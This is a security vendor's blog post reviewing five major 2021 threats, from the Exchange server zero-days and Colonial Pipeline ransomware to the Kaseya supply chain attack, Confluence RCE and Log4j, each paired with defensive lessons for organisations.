2021 was a busy year for the cyber security community. Emerging threats posed many challenges to security professionals and created many opportunities for threat actors. Picus has curated a list of the top five threats observed in 2021, detailing ten lessons defenders can learn from them.
Microsoft Exchange Server Vulnerabilities
In January 2021, Volexity detected a large amount of egress data traffic on its customers’ Microsoft Exchange Servers [1]. Later, it discovered that several vulnerabilities had been exploited for unauthorized data exfiltration by an APT group called HAFNIUM. In March 2021, Microsoft released several updates to patch zero day vulnerabilities found in Microsoft Exchange Server affecting versions 2010, 2013, 2016 and 2019 [2]. Details of the vulnerabilities are provided below:
| CVE Number | Vulnerability Type | CVSS Score |
| CVE-2021-26885 | Remote Code Execution | 9.8 (Critical) |
| CVE-2021-26887 | Remote Code Execution | 7.8 (High) |
| CVE-2021-26888 | Remote Code Execution | 7.8 (High) |
| CVE-2021-27065 | Remote Code Execution | 7.8 (High) |
Exploitation of these vulnerabilities affected 250,000 servers around the world [3].
As Picus, we published a detailed blog post about the Tactics, Techniques, and Procedures (TTPs) used by HAFNIUM to target Microsoft Exchange Servers.
Lessons learned:
1. Continuously check your network traffic for anomalies
Vendors’ response times to vulnerabilities can be longer than expected. Although exploitation of vulnerabilities was first reported in January, Microsoft released patches in March. If organizations were to wait for a patch, they would be vulnerable to exploitation for nearly 2 months. Therefore, network traffic should be monitored all times and analysed for unusual activity.
2. Perform threat hunting after patching
In the case of the Microsoft Exchange Server vulnerabilities listed above, patches were effective to remediate the vulnerabilities and block new exploitation attempts. However, threat actors still had unauthorized access to servers that were exploited before patching. Therefore, it is important to perform threat hunting activities and assume that vulnerabilities might be exploited before patching. Check for leftover artifacts of the threat actors and make sure to remove any malicious files from your network.
DarkSide Ransomware Campaign
The DarkSide ransomware group provided Ransomware as a Service (RaaS) to other threat actors. According to Elliptic, this campaign extorted over 80 million USD in 2021 [4]. Most notably, US-based Colonial Pipeline Company paid 4.4 million USD after its operations were brought to a halt by this ransomware campaign in May 2021. After the ransom was paid, the pipeline slowly regained its operational capabilities.
We published a whitepaper about Tactics, Techniques, and Procedures (TTPs) and also tools utilized by the DarkSide threat actors.
Lessons Learned:
3. Practice risk management for the worst case event
When ransomware threat actors infect a critical infrastructure, they hold hostage both the company and its customers. When Colonial Pipeline Company was hit by ransomware, fuel shortages occurred across the US and some airports could not provide fuel to airlines. This was one of the worst case scenarios for the company and the society. Practicing risk management for assets is important to estimate and understand possible outcomes in the event of a cyber attack.
4. Implement behaviour-based detection
Ransomware is evolving and mostly uses legitimate tools that are already whitelisted by organizations. Therefore, signature-based detection falls short against them. Behavior-based detection and proactive approaches such as attack simulation and security control validation becomes more important each day.
This lesson is also a key recommendation from Picus Labs to help detect and respond to the techniques identified in the Red Report 2021.
See Picus in Action
Watch how you can easily simulate DarkSide ransomware to assess your security posture and prevent them with signatures of your WAF, IPS, and NGFW.
Watch how you can easily simulate DarkSide ransomware to assess your security posture and prevent them with signatures of your WAF, IPS, and NGFW.
Kaseya MSP Supply Chain Attack
In July 2021, REvil ransomware group (also known as Sodinokibi) launched an attack campaign against Managed Service Providers (MSPs) and thousands of their customers. Like the Solarwinds attack in 2020, Kaseya MSP attack was a supply chain attack and delivered using Kaseya VSA Agent Hot-fix. According to Reuters, the attack affected between 800 and 1500 businesses around the world [5]. REvil demanded 70 million USD for a universal decryptor, however the website of the ransomware group disappeared some time later. Due to the size of the attack, the amount of ransom collected is unknown. Kaseya later released a universal decryptor for the victims.
Click here to learn more about Tactics, Techniques, and Procedures (TTPs) Used by REvil in theKaseya MSP Supply-Chain Attack.
Lessons Learned:
5. Adopt a zero trust strategy
It is near impossible to defend your assets against zero-day vulnerabilities in widely used services. However, by adopting zero trust architecture in your network, which limits the access of threat actors to network assets, it’s possible to significantly minimize the effects of attacks as well as any damages which may occur.
6. Monitor use of built-in operating system utilities
Adversaries prefer to abuse built-in tools in their attack campaigns. For example, REvil used numerous living off the land (LOL) utilities, such as PowerShell, certutil.exe, and MsMpEng.exe,to conduct the Kaseya attack campaign.
The increased prevalence of this type of adversary behavior is also a key finding of the Red Report 2021. According to the report, attackers predominantly use built-in legitimate utilities to perform all the top 10 techniques, revealing adversaries’ preference for abusing legitimate tools rather than custom ones.
You need to monitor the use of the known living off the land binaries and scripts (LOLBAS), to identify their malicious use [6].
Atlassian Confluence Remote Code Execution Vulnerability
In August 2021, a remote code execution vulnerability was disclosed by Atlassian with a CVSS score of 9.8 (critical). This vulnerability affected Atlassian Confluence Server and Confluence Data Center versions prior to 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. US CERT and CISA warned about mass exploitation of the vulnerability urging organizations to apply necessary updates [7]. It was mostly exploited by crypto-mining malware.
Lessons Learned:
7. Maintain strict supervision of your public-facing applications
Public-facing applications are a great place to gain initial access to any network and threat actors often utilize vulnerabilities in these services. When a critical vulnerability is found in a public-facing service, it is often used as an entry point of mass exploitation and lateral movement. The traffic received by these services should be kept in check and security controls such as NGFW and WAF should be properly set up and validated.
8. Test the effectiveness of your security controls
Investing in security control devices does not provide complete assurance that your important assets are secure. Policy weaknesses and misconfigurations can create gaps for attackers to exploit so ensure that you regularly test your controls to ensure that they are deployed correctly and tuned to defend against the latest threats.. After applying a patch or applying a configuration change, test that affected devices are working as intended.
Apache Log4j Vulnerabilities
In December 2021, four vulnerabilities were disclosed in the Apache Log4j library. Details of vulnerabilities are given below:
| CVE Number | Vulnerability Type | CVSS Score |
| CVE-2021-44228 | Remote Code Execution | 10.0 (Critical) |
| CVE-2021-45046 | Remote Code Execution | 9.0 (Critical) |
| CVE-2021-45105 | Denial of Service | 7.5 (High) |
| CVE-2021-44832 | Remote Code Execution | 6.6 (Medium) |
This library is downloaded millions of times and the number of applications that use the Log4j library is unknown. According to Microsoft Threat Intelligence Center (MSTIC), multiple APT groups are exploiting Log4j vulnerabilities [8].
Lessons Learned:
9. Improve visibility of your software inventory
It is hard to pinpoint assets with vulnerable Log4j libraries. Even if your organization does not use Log4j in any of its assets, any 3rd party services may have used it and not disclosed this information. Improve supply chain transparency and keep track of 3rd party assets and their components.
10. Better utilize security controls
Due to wide-spread use of Log4j, vulnerable assets can be anywhere and patching them might be out of your hands, especially for 3rd party assets. While waiting for other vendors to patch their vulnerable assets, validate your security controls and test your security posture.
